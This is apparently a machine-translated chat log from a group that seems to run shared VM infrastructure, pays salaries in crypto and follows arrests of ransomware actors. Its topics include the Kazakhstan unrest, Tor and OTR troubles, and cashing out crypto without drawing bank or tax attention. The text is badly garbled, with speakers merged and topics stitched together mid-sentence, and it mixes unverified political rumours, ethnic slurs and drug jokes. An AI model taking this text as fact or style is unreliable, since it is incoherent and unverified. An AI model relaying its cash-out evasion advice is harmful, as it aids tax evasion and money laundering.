friends can solve their internal problems on their own. Kremlin ``` :sunglasses:Protesters began attacking gun stores. Kazakhtelecom cut off the Internet all over the country.How did you summarize the speech )Happy Holidays to everyone, are you alive and well? There was an attack on the Korgan gun store in Alma-Ata. It was looted. 
The police did not come.AHAHAHAHAHAHAHAHAHAHAH)) I can just imagine a new TV "show": "Only they won't be able to gather public capital (fuck that, they will be the fastest ones to change their ways and sing what they need), Usually, the loudest ones yell patriotism when someone who has the most money in the West is the one who likes to blame the West, and then they themselves go to the West with money.``` At the same time a governmental business jet flew from Kazakhstan to Russia. It is not known who is on it. According to some reports, about 10 private flights left the country for Europe in the last 24 hours. ``In gta gbo was not there, what is the reason for gbo``. What is going on in Kazakhstan reminds more and more of GTA Bazarbai warms up the helicopter, they fire live ammunition, we can hardly carry Belarus on our shoulders. The situation in Kazakhstan is heating up to the limit. Protesters began to take the military prisoners. The administration building was set on fire in Almaty. The maddened people forcibly take the weapons from the security forces, and the security forces moved to the side of the protesters. A brief outline of the situation in Kazakhstan: 1. In Kazakhstan, they are silent about it, but in fact the most important personnel decision was the dismissal of Nazarbayev's nephew from the post of first deputy head of the National Security Committee. Abish Samat supervised shadow jamaats, criminal gangs and other marginal foam that are now taking part in the coup d'état. It is not clear whether Samat's ears are sticking out behind the current unrest, but that he has something to do with it is indisputable; 2. Unexpectedly for many, the seemingly monolithic system of Kazakhstan cracked, as evidenced by the resignation of the Cabinet and the inarticulate actions of the security forces; 3. 
Apparently the Soros grid and the State Department have nothing to do with what is going on; the current revolt is quite in the spirit of domestic political traditions. But this does not mean that Western partners will not intercept the protest. This is eloquently demonstrated by Oblyazov's puffed-up cheeks and the grant media's attempt to cover the protests while silencing the looting and violence; 4. Ethnic cleansing is not being deliberately whipped up, but the problem is clearly visible on the horizon. And if now the calls to persecute the Russians sound sluggish and in the background, in the case of an aggravated situation, the pogrom of the Russians (like the Uighurs) can become a kind of steamroller, an entertainment - in any unclear situation, smash the outsiders; 5. Will Russia take Northern Kazakhstan under its wing? NO, under no circumstances. This is a nightmare of the Russian leadership. Unless there is a scenario of total war all against all with a total loss of statehood. The police is taking the side of the Nazi-Maidanists. I'll go and buy horses, the price of horses will go up soon)) Play the Kazakh hilarious Capture of akimats and arson of buildings is the work of the KNB, creating a picture that protesters are terrorists, etc. To have an excuse to respond with forcePatrick said sarcastically, well, nothing unusual, of course, if yes, then it's okay, if no, then something is lateRussia is to blame, as usual?The president's residence is surrounded, the akimats were stormed, riot specialists joined in, like in Armenia or Georgia. They said they were jamming the Internet and communications... The same methodology has long been obvious, Ablyazov is a Russophobe and natophile, he did it.Who does not jump (on horseback)-the Moskalpo country code from the ad, or what? Patrick, so there are already involved Ukrainians? Go figure, what if not the clan, for which they rocked dorzhil or what in vain went, since here, let's do something. 
what to bombard?...he also has a brother, Commissar Rex, no?))he was in the filmrMukhta, I know him, everything is divided between us and western companies.They have been talking about russian occupiers for a long time.They are the occupiers, they didn't build it, Why didn't they bother to build anything since Soviet times? There's nowhere else to get it from there, they bring it to Orenburg from Kazakhstan and Gazprom has no liquefaction plants, so what's Gazprom got to do with it?) They produce it themselves and Gazprom can also be added to the list, Tokayev resigned, Tokayev accepted it, so what's there to look for? They say that initially they were complaining about a gas price hike, and the government met them halfway, promising to lower it, but they sensed that they were too quick to agree and started raising new conditions, and that's when the government decided to give them a boo-boo * again?The fun continues like thisNow on yad in just appeared the newsProtestors in Alma-Ata burst into the city administration building. The protesters are armed with rebar, sticks and shieldsdumay similarly, the negativity came out, it felt better and we should go on living again They got a beating yesterday and dispersed, until the next disco they don't have so much fervor it's not the Kyrgyz they have a day off todayda I think there will be nothing for them now we will watch and see what happens we will not de-anonate but okay or are you from kazakhstan?When Gurbanguly goes there, Rostov will shine in golden statues), Putin does not leave his family behind. It was thought his family has over 100 billion dollars, Nasharbay has something, his family took everything and sent it to the Nazarbayev family to be dispossessed of all assets.In Kazakhstan it is very good, but only for Kazakhs, there is apartheid, ethnic cleansing, and monuments to the founder of the Turkestan legion. 
You can always compare that Turkmenistan is the worst, but you cannot go far with this logicThe French are steppe) compared to the Russian Federation.fuel is cheaper, and many products are the same, or should we just rename Nursultan to Astana, I think there are a lot of complaints. Is it because of the price of liquefied natural gas? @esteban to throw stale olivier in my face, has anyone written to me here? broadcast - it's kind of like a radio encryption, like they are transmitted to everyone, but you never know who is going to get it.If the P2P connection is established, then it's a shoak, stolen IP address of the interlocutor through wireshark or the same on the ISP side can be done.Thanks are there guys have a Google account?
I do not have a description of the protocol was not enoughfits on this, I am interested only in the cryptographic reliability and reliability of implementation and who ran away to whereguan@ryan include apr in pm> and what's wrong with tox? the only downside is it doesn't work offline The project founder ran away with the money he had invested@stanton don't reinvent the wheel )Identification by nickname - RSA public key -> nickname inside the client. Just like pgp does - it looks through all installed keys:sunglasses:The messages you could not decrypt, just ignore them. No recipient's address.@thomas oh, coolWhy carry everything around. You can do this - there is a pool of second level addresses on the torus, they forward the msg stream up, then it fordcasts them all, you can. IP anonymization is solved by a ready-made torus, and protection against reading - PGP (RSA)here by the wayhttp://toktok.ltd/spec.htmlhttps://toktok.ltd/documents.html well kinda described here high level I can not imagine how it is possible to write it without dokitam combo of onion routing, p2p-network with dht, spiritual successor of OTRtox protocol is more complicated than torusNow torus is closed partially)on class flair )on intuitionnapish torus without dokida of course )only sorts and all can it was not so what the doc was deleted?If the documentation was there, why was it removed? How do you write a project at this level without documentation? Why is there no documentation for an open source project with a very complex cryptostack? There is as much code as you want, as much code as you want. And there's no documentation. Look - there's a general flow of messages, everyone gets absolutely everything. What he was able to decipher, that's what's shown.So he's an opensource and his group chats only work if one of the people online but there's no proof of that.I know he's fucking great, everyone says so because I don't know his protocol.Why is tox bad? 
the only downside is it doesn't work offline it's possible via tor but you won't find it if you find it, i'll look into it and we'll switch to tox find me documentation on the tox protocol like pgp cata can i write a mobile app? You only see messages whose RSA public key is installed. And all you do is wander the desert for some reason. And you could have seen assault ships on fire at the approach to Orion and watched the C-rays flicker in the darkness near the Tannhäuser Gate.I don't like chat rooms, can I make a corporate forum? And then Turtle suggests that you mark all the pictures with traffic lights or you won't get past them. But there are no pictures. You're completely clueless, and you realize that the vile creature has been overturned for good.Survival of the strongestNu then you can and turtle dig, pansyrem)It is necessary to call the ancient Ukoh - the sea digging)well, that and food and drink :sweat_smile:pischolasda, otr tightly includeda least one was: either e2e all without problems, or OTR with autoconnectiona very difficult to work in the new version of Rocket, e2e half does not work, with OTR tortureWelcome all!now i already think that the robot your actions it can not turn over on its owncopy of clever words then to the obedient imagine that you are walking through the desert, and you see an inverted turtle voda-campha ) to empathytest turing passed typical excuse robot)) i have a kinsmenet, i am not a robot, i am a person ziggygunsmartin i am not a robot, i'm a terminator)adamAnglicans there do National Cyber Force with a headquartersYou're a robot, confess what else will be asked to do in the near futurefuck captcha, touch mouse that can't get cheese)))@all Please also email me if you have VMs on your farm but they are out of work and can be removed.+@all IP of the VM farm: ```162.244.80.105``` All who work on the VM - waiting for feedback on the work of the wheels Do not hesitate to write immediately in person. If any brakes, bugs. 
If you have e2e enabled and want OTR, then you need to turn off e2e and turn on OTR Because e2e + OTR = trouble ))At this point - as elroy wrote I'm looking at the settings where you can turn off the standard soundsYes. I'm also very grateful to @elroy) spskotory distractingk by the way I turned off in the notification settings, it is in each channel shouldThe right at the top 3 points, Notification preferences + completely agree with basilThe question. Now if someone writes in general constantly beep here is this. And it is not clear, you write it or in the general chat. Maybe you should turn it off. Constantly distracted to check . To you or not to you: in the new version of rocketchat only this ability to communicate OTR. UserA sends a request to OTR (key exchange). UserB receives the request, exchanges keys. Keys are the same about OTR, yes, some kind of inconvenient thing, you have to wait for confirmation, in the settings there is nothing on this e2e should not distract Demetrious while please enable chat)) Gentlemen, chat on the new version of rocketchat) All will configureDa and e2e was comfortable, too ... very uncomfortable to work so is it still possible to return the automatic connection OTR? We generally stupid to have a choice with it or without it well notch OTR such a false api that there is no button to make it always onnu yes, you start otr - the interlocutor request to start the conversation should pop up on the idea that the interlocutor confirmed the start of the conversation and turn on OTR - hmm ... That is, to knock and break into someone openly, until he pays attention to you. and then both turn on OTR. right? Thank younadoado that the interlocutor confirmed the start of the conversation and turn on OTR, for now in this mode, if nothing has changed since yesterdayAnyone works OTR? basilpriy @blakey go away for a while, soon will not come in again glitched@ruby higrempriyThere just appeared the second.... It wasn't there before I posted... 
I closed the first one. It's OK now.If anyone has a second "general" channel (with an unread message), do a "Hide" on it.It must be the second general (do you have two?)And why doesn't my general reset that I've already read the messages all? In addition, when you click on the menu "Mark read" on the general, I pop up a message "Not allowed"??? allennickblake@all Hello All! Who yesterday could not get to me and get the WP - write in person! thank you, everything has appeared))) @all The farm VM will not work. Techrabotka an hour and a half now the general just disappeared :Dwildganeshmitzi just the sound of messages now the same thing with the working channel can it sound from the general?If someone has a second channel "general" (with unread messages), make it "Hide".everyone has two main chats and constantly hangs notification that there are unread messages?biggiethomasodischadelroyvottwo days, neighbor svehehu thrown out, I hope I will not blame that this is a glitch with a hide, it's a glitch in the base I now have two general chatsrubybrookspingweldon thank you tomorrow wrotenight sleep tomorrow means I have no responsefrancesa I do not give zp I keep you informed r guysPornohub writes that they have not fallen asleep, I do not need your access, I do not need your cards, play blackjack and whores, he certainly does not mind))) just the board?dmit only you do not give me access to the board, even if I really beg to raise blackjack and whores at last) go to the board raised!) krasava) @carrol check out to test the load on the chat))) @manuel well finally! )manuelorval by the way, and what locker got in the UA? 
eh, what kind of press, do not even make screenshots forum lookmahaha on some forum, write a seller pliz) oh, Facebook lost a base of 1.5 billion people - and where sell?no, you can open it, but it's complicated and expensive, sometimes it's fun a lot of people who do accounting on google accounts in tables i tried to fuck off once, google went straight to the defense and started yelling into the phone though google is not so easy to open this shit, let them open google a couple times they tried to open me often, it was interesting, first time i ever fucked with hackers):sweat_smile:Fucking hackers!the fucking hacker went, the mail was returned, and the exchanges have long been dead, let him have fun)akamis exchanges is normal? in my phone 17 messages "password has changed "Fuck me too, I had a Saturday at 5 am stolen mail and all the shares exchanges) I at 11 am as started receiving mail and surprise) oh, facebook lost their base at 1.I was 11 in the morning when I started getting emails and amazed) facebook lost its base of 1. 5 billion peoplexxZ It was all zelensky, he went there asking for something in california have they switched off?Poor trackers now run around and do not know where to look for treasure (google and amazon services are also lame) I thank them for their quick response and action) Just kidding) We will do it@Garfield Your appeal is very important for us.+@carrol accepted But still, about the channel announcemet, someone responsible for the organization of processes, tell the management this proposal, it would be convenient for all!!! I pressed and the other contact's otp also activated, as it was in the previous version@demetrius can you return the autoreactivation otp? without waiting for confirmation from the interlocutor?but don't sleep, this is a mistake, it's as old as myoni should be pleasing to the eyes without women, it's fucked up to work in the real world. 
in all the history of my work experience, not once has there been a team with at least one girl protests, I have not touched, I do not knowAngelo, you know who the brunette here?i recently watched Hottabych - it all started with the phrase "i wonder, are there girls among us?" we are team building today - blow on a brunette :smile:every morning to get out automatically for the integrity of the team) would order a shuhet then i do care about the integrity of the team)) i'll fire you if you don't do something ``` the exact phrase for all)or there will fire if something is not done )))) I can not then we'll be here and the important messages will go and sit and wait holy shit so myselfvot herefor example, the message - who has not received the salary is not lost in the stream of reason )) so it was conceived yet jeremya there pure ad-hoc but in general is just a bunch of thingsEt is a sensible idea. Say, dear, why is the channel announcemet not used as a notice board, it would be logical and convenient, clean announcements without unnecessaryOf this, or from another perspective, Dim? it's not a bug, and fichanu then normi tsap webu all and everyone hangs with an icon all second gengal ?it is necessary to heat the laptop screen on a candle to appear a message?)who killed insta and facebook? we need the load on the chat, let's spamkolyan writes invisible ink, as Leninya passed the test ! where my win 5K zelenii ?:upside_down:test passed as I missed the chat !angelo all resethe again on the fly chetotochili?) stuffychetto not working right awaya no, there is, but the sound was before nastylucky you)) and I have no soundsada interfere can turn it off? and also the sound of new messages are on the generalFrants there still alive, do not know?) yes I think nesk times it zeroed, but certainly not every query yes, this is the problem of TOR It was necessary either to reset the identity, or wait for "half an hour") no, you do not understand. 
I have not opened the site at all, and then bloop - available. I went in, and there's half an hour as discuss@elliott that's the thing, you were not in the chat, that's the message and were not updated for youvot that inconvenient kapetz, I remember it was always interesting, how is it that you join the chat, which a minute ago was not available, and there is a full channel for discussion of the new version? It's like a dns? I understand what collin means - the interlocutor has to confirm the apr can still be auto as before? all the settings and the inscription timeoutno I click on, and in response modalka from crsticom now even need to confirm the other party yes, I had to turn it on myself it was manual, it was e2e turned on automatically when the conversation begana bad e2e is gone in general how?with a manual confirmation of the manual staletr does not turn on, it says, the timeout is the main thing that works. e2e in previous versions always glitchy2e need to see e2e works fine, but about OTR and e2e?i've seen it since november 20 today)) since old versions, the second general has been stuck in the database with a new version of rocket) *general and generak second with a message unread) OTR also does not work pass from e2e now does not ask when logging in repeatedly so?Garfield@all write in person who did not get zpfrances all are also slow when scrolling?lonpriemesteban:infinity:carroltest2collinpingrocco@all write somethingsomething 
here test demetrius Now you can see that the Tupino government is in cahoots with the americans and follows all their orders. It's not like they were storing cryptocurrency on blockchain.com wallet like suckers. Cryptocurrency is likely to be banned, up to and including criminal prosecution, but thanks to who? Revil thank those guys who were smart enough to withdraw money and store it in a warehouse in their apartment, and now we have another headache to withdraw our money in real. Bastrykin sat back and thought, "Well, he thinks these are dilettantes, but there are non-dilettantes, and he seems to be afraid to imagine what's going on. =) the news is that carders and shop owners unicc@kermit you know everything, but who is The Infraud Organization and they took them? I like you like that too. 
you're liked Merry Christmas to the Orthodox !thx)pongping Merry Christmas ! Here we go Here we go again, I think it's a little bit like a hooch from the dash?)yo, man! Mutual broWe all have a good weekend! Write to the sports lottery :) I will complain about Torping`https://mb5fbvx72fbod2hkirfecc5nh7lwq6ke7xocn7j2u7raiwbytvevpbad.onion/` this git I do not breathe - Onion-site does not find the git visible noda is showing off (nothing just no connection502? like git again laid down? `https://youtu.be/NungW24Z5Eg` Ta, noooooo. I don't. call tech support, what the fuck they do there! It's too tight (nromI'm fine. It's fucked up how it works. Does it work for everyone? I get it every once in a while. Finally, it's true. Dincek came alive. I've already told you, you can "play around" with itTry to play with the parameters of the torus. This might speed it up. 
For example, in torrc: excludenodes {us},{br},{jp},{ca},{au},{cn}nu all toad does not quack/crocodile is not caught) `https://youtu.be/A5rOxIfY4Us` write a collective complaint to Putin)Communication breaks, write not vohmozhno normal, in admins +- goes the same, but the most stares Rocket week already tor brain ipetBut how exactly in console do it, even I do not know. I change in the tor browser from the menuA how do you get the active chain in the console? I did not look. I'll test the sert and chain sometime at my leisure. Maybe the browser also contributes to these bugs.And watched the certificate itself, the print is the same? I did not test the change of chain, but when you reload the page sometimes gives a request to update the certificateA when you manually reload the tab, change tor chain? I have the same happens, can not restore itself, then I just change the chain without refreshing the page and the connection is restored (and otr does not go down).According to my observations, rocket can not restore the connection by itself, there is a jam. It is necessary to manually reload.It would be necessary to see the sorts of torus, maybe a bug somewhere ...At least I have soJaba also floats. It takes a long time for messages to go / come, then does not quiver at all. But not so noticeable, probably because the client does not panic, and waits for the restoration of the connection silently. If there is no connection, it stops squawking. It's not the rocket, it's the tor network itself which is unstable. I need to reboot, and sometimes to recreate a tab in the browser. say all Rocket is not stable? a week already torment me loose connectionvirustotal also do not vjobyvayut?)At lockdown, when even dincheck does not work, it would be very helpful@rags, and how are we doing with the farm? (Who will fix it? :sweat_smile: )Yes, it really does not work.yep, the ping goes and 504 Gateway Time-out - .COM in fact Hello, all. 
Dyncheck isn't loading today...
Strange... I'll restart the tor then hi, GITaic is floating fine)@all Hi and have a good day. Git starts the day with errors again.422There's no such a feature16,1,2Looked in your@all guys, and in VMware you can do snapshots on a timer or scheduled? @hector hello) how much more can you) stop chewingzp did not fly through ?hey everybody, don't read it or don't read everything) was there anything interesting? @angelo you're here againpfff, we haven't finished 1Kebat 530 new messages since yesterday what for? Vovkamnuzhanu for 45 it's already passed the 39th bit It's ok, let's wait)) We are not here for that)) or just the old timer?) to play sapper) but anyway, I'm glad not yet given out nothing lostVerboy nekst dormorski fight can arrange, as an option, 16-rich dominoes @hector email)tell you, i also want to tell you. 
i was thinking the same thing with the saltikpiks what you send in private to each other i'm afraid to ask.I have to run away, I'll be there in a few hours Get well!get well get well get well! hello, i'm sick. i'll be tomorrow from 2 pm after the detention of revilovs otshey kopecks et ovshey only from the Kwon department one polkan 20 found 6 lakhs`https://yandex.ru/news/story/SBinance_vyveli_bolee_6_mlrd_rub._posle_idei_CB_zapretit_kriptovalyutu--637360fa16ca2dda8388e7756b66e066?lang=ru&rubric=index&fan=1&stid=ks4auh6sB-g-KsMsvxl8&t=1642705102&persistent_id=177779698`)))damn, I should write a book, I have an idea already bookmarks will do in the woods with flash drives containing kopites, It's a question of time to input, to withdraw, to store, not to transfer, to view, and so on from all sides, to see the flows and draw conclusions, and tax them to replenish the treasury, that's reasonable and more profitable for them. Most likely, fsb understand and see the flows of crypto. But for volumes and transfers in general, they can fuck up Tink does not block even for alimony accounts, so let's pray for Tink. P2P and online exchangers! How will banks know if the transfer is for crypto? If you exchange your crypto through P2P, for example on the Binance exchange or through any online exchanger, you receive funds from individuals and, as a rule, there is no marking that it is money for cryptocurrency. So it all depends on the particular bank whose card you accept such payments. Some banks are more meticulous about tracking such receipts, and some are less so. Much depends on the regularity of transfers and their volume. If you occasionally accept small payments on your card, most likely there will be no questions to you either from bank or tax office. How will the tax authorities know that the transfer was for crypto? The card just received money from another person's card! Maybe my debt was returned to me, it is not necessarily the sale of crypto? 
As a rule, banks report to the tax authorities and Rosfinmonitoring on large transactions. If these transactions are systematic, they attract attention. When additional attention is called, we get blocked under Article 115-FZ, that is, it is a question of the volume and systematic nature of these transactions. Accordingly, the data that you will submit to the bank as a business case, within the 115-FZ may prove to the tax authorities. Twenty to thirty million dollars a year for a small company is the norm, if you pay fines - in short, it's fantastic they do not want to pay taxes themselves, it's their bread and butter, they change details small Ipshniks and OOOs charge by cardwhy do you ask?html `maybe just the percentage will go upa I think so far it will remain soa so from 2018 you have to pay 13%, there is just no control, but this is a new topic, as from 2021 January tightened If there is someone who is trained in this topic, share your information, we will all thank you )))) but this is another topic, I am interested in withdrawal through exchangers but you get under expense control, automatic ones are rare for me, usually manual transfers you always clean the breakwaterthere is also a topicmetnii in moscow city exchangers automatic from whom to ask?I'd rather take it out to the cache and give it to charitydolgprosyI want to understand, calculate the risks, so to speak, you do not cash out through white exchangers that, for example, cooperate with Binance, these exchangers are essentially physical persons cashing out how? 
crypto cashing out is taxed at 13% is income`https://pravoved.ru/question/3137767/`t there legally selling it on the exchange you are wrong thinking you are wrong, just withdrawal through the exchange is a sale, or am I mistaken?fuck this happiness if the tax office fines me for the turnover on my cards - i won't have enough years to pay for the rest, otherwise i'll be fucked, then you need proof or are you a self-employed miner?It's not about selling it, selling crypto is legal, you can sell it + transactions between physical persons, it's unjust enrichment, transferring crypto is not like personal income tax, shut up and imagine, all you took out in the last three years will be taxed at 40% and I will send you a payment receipt. I don't know how to pay 13% because they don't give a fuck every year more and more control I've never heard about taxation for transfers (and I don't want to).I've never seen copying these transfersI generally tax authorities clearly paletize transfers through the rapid payments system, so exchangers sometimes write them off - debt, charityWith exchangersGuide how not to fall for payment of personal income tax from crypto, which is displayed on bank cards. By law you have to pay 13% personal income tax on the sale of crypto, that's in theory. But how in practice? Do the tax authorities really see all these transactions? I don't know, I've seen ads on Hss...I used it last time, about half a year ago. If garlic*benny already requires Payeer verification? I don't know, it's really weird...buy some cookies, refill them and all.Isn't it weird to buy Benny?.saw on sale once, already with payeer verif) By the way, Payeer not bad wallet. There are basic types of crypto, rubles/dollars/euros, built-in exchanger of it all. Withdrawal limit is $999 (a year ago it was $2000). This is without verification. 
Compared to kiwi and yandex-many normal limit (not 15000 p) was possible to order the card from this rocket at that moment, I mean webmani)mmm 2012 =)for such their horse interest in general is supposed to be shotenovat themselves read in the description =)https://www.microsoft.com/en-us/p/%D0%A0%D0%BE%D0%BA%D0%B5%D1%82%D0%B1%D0%B0%D0%BD%D0%BA/9nblggh0b63g?activetab=pivot:overviewtab it was they have it in the ads, but that something did not work))) yup, catch up and put it againhttp://www.rbc.ru/rbcfreenews/60061c2e9a79476d85e19139 now googled like stalled webmoney in the old days, she worked with him:Dtam 10% seem to add to the account at the end of the month if the money lying :D =) from roketchat in roketbank? =)To visapotom somehow closed itI remember it was instant withdrawal to cards, transferswmr where can I withdraw? Withdraw wmxWithdraw wmr then instant withdraw wmrRemember the time when they sent instant money transfersNo withdrawal, pay 70 to btk koshOny generally gone crazy) 24 hours to withdraw....There are 24 hours to withdrawalAh they threw not urgentlynado was 70 bucks in crypto urgently to throw, asked 90 da wmx in general yank on the terribleThey have there cryptocurrency wallets (wmx), works... But the percentage is only a large for everything... There at 15-20% or more you can get with their exchanges/withdrawals as it turned out they are sometimes necessary So webmani under the hood. Although Western Union and Golden Pay transfers are interesting as long as they are not pigeons, Webmani has an interesting model of money turnover. It works through assignment of the right of demand. Will we get crypto through cession of rights of demanda Hello webmaniWe will buy crypto for virtual moneyTax cryptocurrency is already banned, cryptoassets are allowed:disappointed:`CB also offers to block transactions for buying and selling cryptocurrencies for real money`https://www.bfm.ru/news/491066 `daba which desktop 'Psi'? 
They changed the address or what?'better in the toad' my toad stopped working in KazakhstanInternet stopped cutting off likeNow bitcoin is growing? :) he's from textiles, lol> moscow, lublino, we work You're a neighbor of shila from bloodstock:)Elm street, 666 ahadom kefirau street miradom kolotushkina Pushkina streetMoscow, lublino, work cash on the spot give me tea, come, why not in vk@frances, send me plz link to your profile in the toadMaybe start, better to the toadHello to all friends!So that's right @frances you're here with good news?Me and the bot are carifiers@angelo your prayers have come true and we are there because we eat9 out of 10 people don't give a shit what to eat soon people will become dumb, fish has become expensive here so it depends on the region4-5 kgsemguya for 650 berupizdetsoni really cost like a plane even kamchatka crabs have sea delicacies here our specialty store 1080 for kg has gone over a thousand kgGomer what price?we don't have ice rinks either) the main thing is not to look for it at the rink, like in Jumble) for me, it's just a matter of finding ice) there are salmon carcasses of 6-7 kg, and they would be glad to say "goodbye, you fucking ichthyander", but it's not polite) just like in the summer, though they live very well, In winter, I go fishing in the store in winter. 
They never fucking learn how to do it, they drown themselves and their cars, they want so much fish, there's a video on YouTube, the ice is breaking right under the fishermen, but the most stubborn sit and wait for a nibble, and every year the same guys get carried away on the ice together with their cars ahaha) well you try) under the ice fishing in winter fishing is important not to become a bait pod salts you can do just underwater hunting here majors, I think chistagans cook dumplings or macaroni sweat..... ``https://podlednik.ru/lovlya_zimoj/rybalka/zimnyaya-rybalka-dlya-nachinayushhih ``aha, he left to take a loan we hope now franses will come and multiply the bread and fish, and everyone will have enough>develop hunting and fishing skills i've already started to look at the backyard cats, do i have to eat them for a week? if i buy a double big tasty now, i'll be out of food tomorrow you need to save money. if i were you, i'd buy a doshirakurrrrd double big tasty! I'll go to the mac. I'll buy a couple of cheeses and you won't sleep at night. It's food and energy. She likes mephedrone, she likes mephedrone. And in my yard, there's a girl with a rack. And I'm so in love with her, and I'm so in love with her.regular salt, like meth@Garfield ate the cat already? better to clarify the fuck you, jocks, know)what about the other one)yeah I get it)enough about the other salt on it steaks cocksucker I would not give It depends on what kind of salt) Good idea, I should go to a neighboring housexxz, I used to be able to go to a random apartment in the neighborhood and ask for anything, saying I was a neighbor - they always gave it to me. Now it's fag on fag on fag Who goes to a neighbor to ask for salt?) 
You're right they will)) Yeah, and my death is in the egg Your life is in the hands of the Franz as long as I'm alive - there's hope and they'll fuck you up. Now you go and ask your neighbors for salt. As long as we live like slaves and survive the world will not get any kinder Respect is built only on the basis of mutual respect, women not to beat, old people to respect. I don't mean my grandfather, but as an example Fuck him, what the fuck? i should respect him? Fucking drunkard let's say grandpa is 60 years old. i broke this stereotype in myself a long time ago. i don't know why time will come and how many former whores will be grandmothers. why the fuck do people have confidence that old age equals wisdom, kindness, education. grandpa once walked down the street, and i met him. i just walked without doing anything he just took me and fucked up his face. well i dodged. he did not say a word and went on to stop the words - stop me, you anger Satan:) maybe even a dumbbell there is just a trick, who repeatedly that without a queue they have in their bags 40-50 pounds of what nity and beer-pumped beer too?it will not stop the bubkas, believe me, it was scary to look at me then. i weigh 93 kg and pumped up. i'm not proud of it, but it was nice, i once said that without queuing .... i took the sin on my soul, i had to tell everyone to fuck off. honestly, was it scary?No, I went in silently and sat down right there. Did you break the second limb? I said, sorry guys, I didn't have to wait in line. I remember I went to the surgeon to check the stitches (c) The grandma from the queue just to ask, I didn't have an appointment, give your father a break and when will he be back?:joy:Can I bury a dead man yourself? Let's just say it's better for a living person not to be near me. Are you even alive? We will be when the State of Moscow appears on the planet. 
It's not Biden who beat us, Biden beat us. Have they updated the resume yet? It's been a long time since your wife left you a lover what do you have there bomzhi bomzhi still in the freezerDa try to call @frances like rain in the desert, bomzhi Kermitovskaya usladako me pigeons fly by themselvesti expression "make a bum" will play new colorsa whores? then on bomzhi then go to the sparrow and not infinite they are as the great D said, hang on. soon the neighbors will already look at my passion for pigeons there, hang in there, or hang in thereDon't have money, but you hang in thereSalam in halvesI mean, I don't knowwhat's better, I can't say maybe some Coinomi will do (it's multicurrency)@ruben , you surely can recommend something for Ether...guys, what wallets for _Ethereum_ do you give preference to? mine wants to build a chinese wall in my house with it.... 100 times regretted that you bought a three-ten converted to 2-kusytsuki such i himself last summer sheathed the garage, the sheet osb cost ~ 1.5k, then when I did, the price fell to 1.1Her will understand really with these prices of building materialsinflationPogodi that whether more will be yesterday Ytong gas concrete rose in price from 7950 to 9100. This material should be cheaper in winter, not more expensive... Hello, everyone! 
Who hasn't received a salary yet - send me the address of the wallet in my personal account@allPerl/Scala/Go/Lua all with knowledge of these languages in my personal, now) nocturnal admin, but who's to blame... Who's the "stand up men" here and who tripped us? Volochkova??? Nothing, I learned how to fill the empty space in my stomach with water. mushrooms, bacon and fried cabbage I won't be long, @angelo20.21 will do, don't major, keep your letters, I've hated your numbers in my private affairs since I was a kid, we can draw 282 just like that, I don't need any article, what do you need, again part 2 article 187? Do you need an article about cyber samurai?They did not detain Jigarkhian and Sookoshvili?) Like the "Robin Hood" girl - she took from the rich and gave to the poor. You like to intrigue. How do they give? Right, there monkeys are delicious and giving:joy:There is enough work to do. https://www.securitylab.ru/news/529580.php everything is shit except mochiparni and tox is as shit as it was or is it better?it's sad....oh don't make fun of me like that!!!!! it's a joke, there will be no more zpDa it would be cool to share...norm you didn't share 32? you're already in the black and you're in the black) put it on 50 Cool! How long have you been standing? agent 47? they're better off playing ninja turtles) we have a strong male friendship without your bullshit games... what's that? angel in a cockerel? 
ahahaloloslubstvennyi da they have a romance i love you!you're too fucked up, you're too fucked up, it's like you haven't eaten any living shit yourself, well after that there's nothing to add, the weirdest thing is live spiders, these faggots try to get out by the throat, you need a drink, i remember eating cockroaches in a deep fryer, you probably ate them already, I will survive cockroaches@angelo zhivine fit) well, then you still have to get up from the couch project "mad drying" you all are handsome <3 no negativity guys, did not want to offend nunu also theme ok so dry up until what da IT guys all fat@angelo ping or until someone dies from hunger))) judging by the wait to 100kagan probably the leadership is waiting, until a little grow ;)As always, before the issuance of wages the bit goes upDon't be bitter, one way or another a new window of probability will open.:`(Well, then I will lose a lot and put up with it.As long as the playful moodPoem I no longer want to))))))))If you want.Absolutely. And talk, and kiss, but - later.Just do not tell anyone And kiss? And talk?) All, do not fool around.What to wish for.... Guys, thank you very much, I withdrew my question.Ni-nothing.Or nicks? you have a tor ekspert? so look what's in the logsI supposedly tor is not working. Christmas miracleNo. thanks, but definitely not.Different chains for tor. Different programs. tor browser and explorer bundle are different exemplars, different behavior. One works, the other doesn't. I have the same problem myself, but my chat is constantly dropping off and the browser starts up for 2 hoursCHANGING the ceiling....A. how. I. Here. Turned up? Yeah, that's a lot. But still, it must have been the torus. I suspect it's a lot. I have no idea. Toad got sucked in while I was texting you. It took 37 minutes to connect. What was the problem? It wasn't the torus. Yeah, thanks. 
Now it works.Angelo eat anything that can moveAll check the pulse)Funny.Eaten.... Toad.....@brent check tor-connection worksToad worksLaughing together? I can't get in. I'm not an asshole frenchmanDickhead. I'm not joking here! toad good, toad delicious, we're talking about food right?! I can not get in 27 minutes.norm (me)Friends, what's with the toad? Also remember the "designer red" so you can make visual masterpieces from food that bums all eaten, seniors entrance locked in 5 locks?) terrible movieblin, I somehow ovmoblennym movie Tusk ostavlyayut find out how to do it all you can sharpen anything, even the banister from the entranceAha.there was a man with a black hole instead of stomachFilm remember freeway 60 holodets legs) first of all need to get rid of the stomach.I think the title will be this: "Without feet is not convenient to live, but nourished" @angelo you there? Have you started to write a book about culinary research on a living wage?) What is your ideal internet Answer from 77.88.55.55: Number of bytes = 32 time = 4ms TTL = 246 Answer from 77.88.55.55: number of bytes=32 time=4ms TTL=246 Reply from 77.88.55.55: number of bytes=32 time=4ms TTL=246dinner ping Reply from 77.88.55.55: number of bytes=32 time=4ms TTL=246 Response from 77.88.55.55: number of bytes=32 time=4ms TTL=246 Response from 77.88.55.55: number of bytes=32 time=4ms TTL=246good morning)hello paravozikgood morning) morning pinghttp://www.kns.ru/product/kompyuter-dell-vostro-3888-mt-3888-2918/ grats! lincanite tachila in magazin, i bought a dell for linux, i've wanted it for a long time, it's a great machine. write me in my personal@adam@all who we have for git, i can't get it down...at birth, by the way, the baby also secretes it in the brain. We are born and die under DMT.) Maybe you have 1-methyl 2,4,6 - trinitrobenzene?)after death dimethyltryptamine is secreted, in fact you are under the strongest halutsagen. 
